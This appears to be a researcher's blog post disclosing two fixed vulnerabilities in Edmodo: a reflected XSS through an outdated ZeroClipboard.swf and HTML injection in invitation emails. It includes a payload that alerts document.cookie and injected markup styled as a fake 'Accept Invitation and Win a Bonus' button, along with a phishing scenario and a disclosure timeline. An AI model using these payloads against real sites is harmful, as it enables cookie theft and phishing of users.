For those who don’t know Edmodo

The safest and easiest way for educators to connect and collaborate with students, parents, and each other.

They count with 59,411,899 members. Huge number.

I decided to help them providing them with two security issues. A Reflected XSS and a HTML Injection.

#1 Reflected XSS

After registering in Edmodo I noticed a request to ZeroClipboard.swf on my Google Inspector.
I know that older versions of this SWF have a XSS vulnerability so I gave it a try:

[code lang=”html”]\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Guess what? It was vulnerable version. It worked perfecly and my cookie was shown in a Javascript alert box.


#2 HTML Injection on Create Invites

This was interesting and I already found similar issues on many websites.
Using the invitee_first_name field you could inject HTML to trick the victim [invitee_email].

Take for example this proof-of-concept:

[code lang=”html”]
Ze<br /><a href="" style="font-size:14px;text-decoration:none;margin:0 auto;background:#69a229;color:white;font-weight:400;border:1px solid #457a04;border-radius:4px;display:inline-block" target="_blank"><span style="display:inline-block;padding:10px 34px">Accept Invitation and Win a Bonus</span></a>

When sending a reminder you could also use the same technique:

[code lang=”html”]
<br /><a href="" style="font-size:14px;text-decoration:none;margin:0 auto;background:#69a229;color:white;font-weight:400;border:1px solid #457a04;border-radius:4px;display:inline-block" target="_blank"><span style="display:inline-block;padding:10px 34px">Accept Invitation and Win a Bonus</span></a>

This would reflect on the victims email. I used the same style of a existing Edmodo button. When the victim clicked, it goes to my proof-of-concept page.

Possible attack scenario:

  1. Malicious user sends invitations with a HTML injection [like my proof-of-concept]
  2. Victim thinks that’s a button from Edmodo and clicks on it.
  3. Victims browser gets hijacked

Edmodo guys were awesome, giving constantly updates on the report status. Also they sent me some goodies but European customs retain the package 🙂

13-10-2015 I sent a email request security contact
13-10-2015 Edmodo replied to the above question
13-10-2015 I sent the security report
22-10-2015 Edmodo replied that both issues were validated and they’re working on it
04-11-2015 Edmodo fixed both issues
06-11-2015 Full disclosure

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